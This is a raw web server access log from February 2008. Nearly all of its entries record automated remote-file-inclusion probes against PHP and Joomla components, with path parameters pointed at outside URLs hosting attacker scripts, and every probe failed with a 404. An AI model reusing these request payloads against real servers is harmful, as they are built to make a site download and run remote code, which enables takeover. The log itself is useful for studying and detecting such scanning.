82.146.33.210 - - [12/Feb/2008:11:10:44 -0800] "GET /logs/index.php?option=com_cropimage&Itemid=&mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
67.212.164.34 - - [12/Feb/2008:11:11:40 -0800] "GET /logs/access_080129.log/administrator/components/com_jcs/jcs.function.php?&mosConfig_absolute_path=http://www.pilcom.net/data/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.212.164.34 - - [12/Feb/2008:11:11:41 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?&mosConfig_absolute_path=http://www.pilcom.net/data/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.157.58.25 - - [12/Feb/2008:11:12:21 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://bucare.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
199.216.35.5 - - [12/Feb/2008:11:13:19 -0800] "GET /index.php?option=com_invite&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.164.34 - - [12/Feb/2008:11:13:54 -0800] "GET /logs/access_080130.log/administrator/components/com_jcs/jcs.function.php?&mosConfig_absolute_path=http://www.pilcom.net/data/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.157.58.25 - - [12/Feb/2008:11:14:01 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://bucare.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.157.58.25 - - [12/Feb/2008:11:14:36 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://bucare.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.157.58.25 - - [12/Feb/2008:11:14:36 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://bucare.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.157.58.25 - - [12/Feb/2008:11:14:37 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://bucare.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.234.97.131 - - [12/Feb/2008:11:14:57 -0800] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
205.234.97.131 - - [12/Feb/2008:11:14:57 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
202.75.5.220 - - [12/Feb/2008:11:15:09 -0800] "GET /logs/access_080111.log//templates/mangobery/footer.sample.php?Site_Path=http://sjyphoto.com/zboard/data/idasc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.157.58.25 - - [12/Feb/2008:11:15:20 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://bucare.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.157.58.25 - - [12/Feb/2008:11:15:24 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://bucare.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.157.58.25 - - [12/Feb/2008:11:15:24 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://bucare.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.157.58.25 - - [12/Feb/2008:11:15:24 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://bucare.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
199.216.35.5 - - [12/Feb/2008:11:15:25 -0800] "GET /logs/access_080120.log/index.php?option=com_invite&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
199.216.35.5 - - [12/Feb/2008:11:15:25 -0800] "GET /logs/index.php?option=com_invite&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
199.216.35.5 - - [12/Feb/2008:11:15:36 -0800] "GET /logs/access_080101.log/index.php?option=com_invite&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.29.25 - - [12/Feb/2008:11:15:43 -0800] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://php.free.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.157.58.25 - - [12/Feb/2008:11:15:54 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://bucare.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.29.25 - - [12/Feb/2008:11:16:50 -0800] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://php.free.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.29.25 - - [12/Feb/2008:11:17:18 -0800] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://php.free.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.116.0.130 - - [12/Feb/2008:11:18:54 -0800] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.116.0.130 - - [12/Feb/2008:11:18:54 -0800] "GET //skin/zero_vote/error.php?dir=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.116.0.130 - - [12/Feb/2008:11:18:54 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.97.131 - - [12/Feb/2008:11:19:55 -0800] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
205.234.97.131 - - [12/Feb/2008:11:19:55 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
207.157.58.25 - - [12/Feb/2008:11:19:56 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://bucare.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.157.58.25 - - [12/Feb/2008:11:20:35 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://bucare.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
71.177.212.128 - - [12/Feb/2008:11:22:38 -0800] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
71.177.212.128 - - [12/Feb/2008:11:22:38 -0800] "GET //skin/zero_vote/error.php?dir=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
71.177.212.128 - - [12/Feb/2008:11:22:38 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.116.0.130 - - [12/Feb/2008:11:23:07 -0800] "GET /logs/access_071231.log//skin/zero_vote/error.php?dir=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.168.15.147 - - [12/Feb/2008:11:24:38 -0800] "GET /logs/access_080108.log//index.php?seccion=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [12/Feb/2008:11:24:38 -0800] "GET //index.php?seccion=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [12/Feb/2008:11:24:39 -0800] "GET /logs//index.php?seccion=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.209.50 - - [12/Feb/2008:11:24:53 -0800] "GET /logs/access_071228.log/!scanhttp://heidik.org/canar/cmdaff? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.209.50 - - [12/Feb/2008:11:24:54 -0800] "GET /!scanhttp://heidik.org/canar/cmdaff? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.209.50 - - [12/Feb/2008:11:24:54 -0800] "GET /logs/!scanhttp://heidik.org/canar/cmdaff? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.53.138.162 - - [12/Feb/2008:11:25:01 -0800] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.53.138.162 - - [12/Feb/2008:11:25:01 -0800] "GET //skin/zero_vote/error.php?dir=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.64.49.252 - - [12/Feb/2008:11:25:01 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://oldbonescrew.de/modules/vwar/convert/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
69.64.49.252 - - [12/Feb/2008:11:25:01 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://oldbonescrew.de/modules/vwar/convert/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
210.53.138.162 - - [12/Feb/2008:11:25:02 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
75.125.41.114 - - [12/Feb/2008:11:25:45 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://oldbonescrew.de/modules/vwar/convert/id.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
75.125.41.114 - - [12/Feb/2008:11:25:45 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://oldbonescrew.de/modules/vwar/convert/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
218.26.1.243 - - [12/Feb/2008:11:26:35 -0800] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.26.1.243 - - [12/Feb/2008:11:26:36 -0800] "GET //skin/zero_vote/error.php?dir=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.26.1.243 - - [12/Feb/2008:11:26:36 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.186.169.183 - - [12/Feb/2008:11:26:41 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.168.15.147 - - [12/Feb/2008:11:27:03 -0800] "GET /logs/access_080131.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.25.34 - - [12/Feb/2008:11:27:17 -0800] "GET //includes/kb_constants.php?module_root_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.98.25.34 - - [12/Feb/2008:11:27:17 -0800] "GET /logs//includes/kb_constants.php?module_root_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.98.25.34 - - [12/Feb/2008:11:27:19 -0800] "GET /logs/access_080118.log//includes/kb_constants.php?module_root_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
71.177.212.128 - - [12/Feb/2008:11:27:45 -0800] "GET /logs/access_071231.log//skin/zero_vote/error.php?dir=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
71.177.212.128 - - [12/Feb/2008:11:27:52 -0800] "GET /logs/access_080117.log//modules/vwar/admin/admin.php?vwar_root=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
71.177.212.128 - - [12/Feb/2008:11:27:52 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
71.177.212.128 - - [12/Feb/2008:11:27:52 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.30.216.107 - - [12/Feb/2008:11:28:41 -0800] "GET /logs/access.log HTTP/1.0" 200 289169 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.203.223.93 - - [12/Feb/2008:11:29:16 -0800] "GET /logs/access_080120.log//skin/zero_vote/error.php?dir=http://www.sternkinder2005.de/video/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
213.203.223.93 - - [12/Feb/2008:11:29:17 -0800] "GET //skin/zero_vote/error.php?dir=http://www.sternkinder2005.de/video/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
213.203.223.93 - - [12/Feb/2008:11:29:17 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.sternkinder2005.de/video/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
208.69.192.133 - - [12/Feb/2008:11:30:11 -0800] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://autodelen.net//downloads/documenten/documenten.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.241.196.84 - - [12/Feb/2008:11:31:27 -0800] "GET /mambots/content/multithumb/multithumb?mosConfig_absolute_path=http://buckleymanagement.com/images/img? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.69.192.133 - - [12/Feb/2008:11:32:11 -0800] "GET /logs/access_080117.log/claroline/inc/claro_init_header.inc.php?includePath=http://autodelen.net//downloads/documenten/documenten.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.69.192.133 - - [12/Feb/2008:11:32:11 -0800] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://autodelen.net//downloads/documenten/documenten.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.203.223.93 - - [12/Feb/2008:11:32:23 -0800] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.sternkinder2005.de/video/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
210.53.138.162 - - [12/Feb/2008:11:34:00 -0800] "GET /logs/access_080117.log//modules/vwar/admin/admin.php?vwar_root=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.53.138.162 - - [12/Feb/2008:11:34:00 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.53.138.162 - - [12/Feb/2008:11:34:01 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [12/Feb/2008:11:34:05 -0800] "GET /logs/access_080117.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [12/Feb/2008:11:34:05 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.53.138.162 - - [12/Feb/2008:11:35:50 -0800] "GET /logs/access_071231.log//skin/zero_vote/error.php?dir=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.58.184.150 - - [12/Feb/2008:11:35:55 -0800] "GET /logs/access_080108.log//tools/send_reminders.php?noSet=0&includedir=http://www.send2thailand.com/image/d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [12/Feb/2008:11:35:56 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.send2thailand.com/image/d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [12/Feb/2008:11:35:56 -0800] "GET /logs/access_080108.log//tools/send_reminders.php?noSet=0&includedir=http://www.sunacoop.gob.ve/images/fbfiles/f.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [12/Feb/2008:11:35:56 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.sunacoop.gob.ve/images/fbfiles/f.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [12/Feb/2008:11:35:56 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.send2thailand.com/image/d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [12/Feb/2008:11:35:57 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.sunacoop.gob.ve/images/fbfiles/f.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.168.15.147 - - [12/Feb/2008:11:37:22 -0800] "GET /logs/access_080108.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [12/Feb/2008:11:37:23 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [12/Feb/2008:11:37:23 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.205.44 - - [12/Feb/2008:11:37:27 -0800] "GET /logs/access_080108.log//tools/send_reminders.php?noSet=0&includedir=http://www.sunacoop.gob.ve/images/fbfiles/f.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.160.205.44 - - [12/Feb/2008:11:37:33 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.sunacoop.gob.ve/images/fbfiles/f.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.160.205.44 - - [12/Feb/2008:11:37:39 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.sunacoop.gob.ve/images/fbfiles/f.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.25.171 - - [12/Feb/2008:11:37:50 -0800] "GET /logs/access_080112.log HTTP/1.0" 200 655360 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
218.26.1.243 - - [12/Feb/2008:11:38:40 -0800] "GET /logs/access_071231.log//skin/zero_vote/error.php?dir=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.237.44.75 - - [12/Feb/2008:11:39:04 -0800] "GET /logs/access.log//index.php?option=com_content&do_pdf=1&id=14//?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.237.44.75 - - [12/Feb/2008:11:39:04 -0800] "GET //index.php?option=com_content&do_pdf=1&id=14//?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.237.44.75 - - [12/Feb/2008:11:39:04 -0800] "GET /logs//index.php?option=com_content&do_pdf=1&id=14//?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.26.1.243 - - [12/Feb/2008:11:39:31 -0800] "GET /logs/access_080117.log//modules/vwar/admin/admin.php?vwar_root=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.26.1.243 - - [12/Feb/2008:11:39:31 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.26.1.243 - - [12/Feb/2008:11:39:32 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.237.44.75 - - [12/Feb/2008:11:39:40 -0800] "GET /logs/access_080105.log//index.php?option=com_content&do_pdf=1&id=14//?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.102.10.26 - - [12/Feb/2008:11:40:26 -0800] "GET /logs/access_080108.log//tools/send_reminders.php?noSet=0&includedir=http://www.send2thailand.com/image/d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.102.10.26 - - [12/Feb/2008:11:40:26 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.send2thailand.com/image/d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.102.10.26 - - [12/Feb/2008:11:40:26 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.send2thailand.com/image/d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.38 - - [12/Feb/2008:11:41:05 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://safebrat.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
64.185.237.38 - - [12/Feb/2008:11:41:05 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://safebrat.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
88.218.97.19 - - [12/Feb/2008:11:43:22 -0800] "GET /logs/access_080117.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
88.218.97.19 - - [12/Feb/2008:11:43:23 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
88.218.97.19 - - [12/Feb/2008:11:43:24 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
